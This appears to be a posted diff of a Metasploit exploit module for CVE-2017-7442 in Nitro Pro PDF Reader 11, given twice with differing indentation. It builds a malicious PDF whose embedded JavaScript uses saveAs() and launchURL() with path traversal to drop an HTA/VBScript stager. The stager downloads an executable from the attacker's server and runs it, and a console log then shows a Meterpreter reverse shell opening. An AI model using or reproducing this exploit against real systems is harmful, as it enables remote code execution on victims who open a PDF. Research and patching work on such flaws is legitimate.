o0xmuhe · July 26, 2017 02:23
diff --git a/nitro_reader_jsapi.rb b/nitro_reader_jsapi.rb
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'

 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
      'Description'    => %q{
          This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro 
          PDF Reader version 11. The saveAs() Javascript API function allows for writing
          arbitrary files to the file system. Additionally, the launchURL() function allows
          an attacker to execute local files on the file system and bypass the security dialog

          Note: This is 100% reliable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
      [
        'mr_me <steven[at]srcincite.io>',  # vulnerability discovery and exploit
        'sinn3r'                           # help with msf foo!
      ],
      'References'     =>
        [
          [ 'CVE', '2017-7442' ],
          [ 'URL', 'https://www.gonitro.com/' ],
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # truly universal
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'XXXX',
      'DefaultTarget'  => 0))

      register_options([
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
      ], self.class)
  end

  def build_vbs(url, stager_name)
    name_xmlhttp  = rand_text_alpha(2)
    name_adodb    = rand_text_alpha(2)
    vbs           = %Q|<script language="VBScript">
    Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
    #{name_xmlhttp}.open "GET","http://#{url}",False
    #{name_xmlhttp}.send
    Set #{name_adodb} = CreateObject("ADODB.Stream")
    #{name_adodb}.Open
    #{name_adodb}.Type=1
    #{name_adodb}.Write #{name_xmlhttp}.responseBody
    #{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
    set shellobj = CreateObject("wscript.shell")
    shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
    </script>|
    vbs.gsub!(/    /,'')
    return vbs
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.exe/
      print_status("Sending second stage payload")
      return if ((p=regenerate_payload(cli)) == nil)
      data = generate_payload_exe( {:code=>p.encoded} )
      send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
      return
    end
  end

  def exploit
    # In order to save binary data to the file system the payload is written to a .vbs
    # file and execute it from there.
    @payload_name = rand_text_alpha(4)
    @temp_folder  = "/Windows/Temp"
    register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
    if datastore['SRVHOST'] == '0.0.0.0'
      lhost = Rex::Socket.source_address('50.50.50.50')
    else
      lhost = datastore['SRVHOST']
    end
    payload_src  = lhost
    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
    stager_name = rand_text_alpha(6) + ".vbs"
    pdf = %Q|%PDF-1.7
    4 0 obj
    <<
    /Length 0
    >>
    stream
    |
    pdf << build_vbs(payload_src, stager_name)
    pdf << %Q|
    endstream endobj
    5 0 obj
    <<
    /Type /Page
    /Parent 2 0 R
    /Contents 4 0 R
    >>
    endobj
    1 0 obj
    <<
    /Type /Catalog
    /Pages 2 0 R
    /OpenAction [ 5 0 R /Fit ]
      /Names <<
        /JavaScript <<
          /Names [ (EmbeddedJS)
            <<
              /S /JavaScript
              /JS (
                    this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
                    app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
              )
            >>
          ]
        >>
      >>
    >>
    endobj
    2 0 obj
    <</Type/Pages/Count 1/Kids [ 5 0 R ]>>
    endobj
    3 0 obj
    <<>>
    endobj
    xref
    0 6
    0000000000 65535 f 
    0000000166 00000 n 
    0000000244 00000 n 
    0000000305 00000 n 
    0000000009 00000 n 
    0000000058 00000 n 
    trailer <<
    /Size 6
    /Root 1 0 R
    >>
    startxref
    327
    %%EOF|
    pdf.gsub!(/    /,'')
    file_create(pdf)
    super
  end
 end

 =begin
 saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
 [*] Processing scripts/nitro.rc for ERB directives.
 resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
 resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 resource (scripts/nitro.rc)> set LHOST 172.16.175.1
 LHOST => 172.16.175.1
 resource (scripts/nitro.rc)> exploit
 [*] Exploit running as background job.

 [*] Started reverse TCP handler on 172.16.175.1:4444 
 msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
 [*] Using URL: http://0.0.0.0:8080/
 [*] Local IP: http://192.168.100.4:8080/
 [*] Server started.
 [*] 192.168.100.4    nitro_reader_jsapi - Sending second stage payload
 [*] Sending stage (957487 bytes) to 172.16.175.232
 [*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
 [+] Deleted C:/Windows/Temp/UOIr.hta

 msf exploit(nitro_reader_jsapi) > sessions -i 1
 [*] Starting interaction with 1...

 meterpreter > shell
 Process 2412 created.
 Channel 2 created.
 Microsoft Windows [Version 6.1.7601]
 Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

 C:\Users\researcher\Desktop>
 =end
	##
	# This module requires Metasploit: http://metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class MetasploitModule < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::FileDropper
	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::EXE

	def initialize(info={})
	super(update_info(info,
	'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
	'Description' => %q{
	This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
	PDF Reader version 11. The saveAs() Javascript API function allows for writing
	arbitrary files to the file system. Additionally, the launchURL() function allows
	an attacker to execute local files on the file system and bypass the security dialog

	Note: This is 100% reliable.
	},
	'License' => MSF_LICENSE,
	'Author' =>
	[
	'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
	'sinn3r' # help with msf foo!
	],
	'References' =>
	[
	[ 'CVE', '2017-7442' ],
	[ 'URL', 'https://www.gonitro.com/' ],
	],
	'DefaultOptions' =>
	{
	'DisablePayloadHandler' => false
	},
	'Platform' => 'win',
	'Targets' =>
	[
	# truly universal
	[ 'Automatic', { } ],
	],
	'DisclosureDate' => 'XXXX',
	'DefaultTarget' => 0))

	register_options([
	OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
	OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
	], self.class)
	end

	def build_vbs(url, stager_name)
	name_xmlhttp = rand_text_alpha(2)
	name_adodb = rand_text_alpha(2)
	vbs = %Q\|<script language="VBScript">
	Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
	#{name_xmlhttp}.open "GET","http://#{url}",False
	#{name_xmlhttp}.send
	Set #{name_adodb} = CreateObject("ADODB.Stream")
	#{name_adodb}.Open
	#{name_adodb}.Type=1
	#{name_adodb}.Write #{name_xmlhttp}.responseBody
	#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
	set shellobj = CreateObject("wscript.shell")
	shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
	</script>\|
	vbs.gsub!(/ /,'')
	return vbs
	end

	def on_request_uri(cli, request)
	if request.uri =~ /\.exe/
	print_status("Sending second stage payload")
	return if ((p=regenerate_payload(cli)) == nil)
	data = generate_payload_exe( {:code=>p.encoded} )
	send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
	return
	end
	end

	def exploit
	# In order to save binary data to the file system the payload is written to a .vbs
	# file and execute it from there.
	@payload_name = rand_text_alpha(4)
	@temp_folder = "/Windows/Temp"
	register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
	if datastore['SRVHOST'] == '0.0.0.0'
	lhost = Rex::Socket.source_address('50.50.50.50')
	else
	lhost = datastore['SRVHOST']
	end
	payload_src = lhost
	payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
	stager_name = rand_text_alpha(6) + ".vbs"
	pdf = %Q\|%PDF-1.7
	4 0 obj
	<<
	/Length 0
	>>
	stream
	\|
	pdf << build_vbs(payload_src, stager_name)
	pdf << %Q\|
	endstream endobj
	5 0 obj
	<<
	/Type /Page
	/Parent 2 0 R
	/Contents 4 0 R
	>>
	endobj
	1 0 obj
	<<
	/Type /Catalog
	/Pages 2 0 R
	/OpenAction [ 5 0 R /Fit ]
	/Names <<
	/JavaScript <<
	/Names [ (EmbeddedJS)
	<<
	/S /JavaScript
	/JS (
	this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
	app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
	)
	>>
	]
	>>
	>>
	>>
	endobj
	2 0 obj
	<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
	endobj
	3 0 obj
	<<>>
	endobj
	xref
	0 6
	0000000000 65535 f
	0000000166 00000 n
	0000000244 00000 n
	0000000305 00000 n
	0000000009 00000 n
	0000000058 00000 n
	trailer <<
	/Size 6
	/Root 1 0 R
	>>
	startxref
	327
	%%EOF\|
	pdf.gsub!(/ /,'')
	file_create(pdf)
	super
	end
	end

	=begin
	saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
	[*] Processing scripts/nitro.rc for ERB directives.
	resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
	resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
	payload => windows/meterpreter/reverse_tcp
	resource (scripts/nitro.rc)> set LHOST 172.16.175.1
	LHOST => 172.16.175.1
	resource (scripts/nitro.rc)> exploit
	[*] Exploit running as background job.

	[*] Started reverse TCP handler on 172.16.175.1:4444
	msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
	[*] Using URL: http://0.0.0.0:8080/
	[*] Local IP: http://192.168.100.4:8080/
	[*] Server started.
	[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
	[*] Sending stage (957487 bytes) to 172.16.175.232
	[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
	[+] Deleted C:/Windows/Temp/UOIr.hta

	msf exploit(nitro_reader_jsapi) > sessions -i 1
	[*] Starting interaction with 1...

	meterpreter > shell
	Process 2412 created.
	Channel 2 created.
	Microsoft Windows [Version 6.1.7601]
	Copyright (c) 2009 Microsoft Corporation. All rights reserved.

	C:\Users\researcher\Desktop>
	=end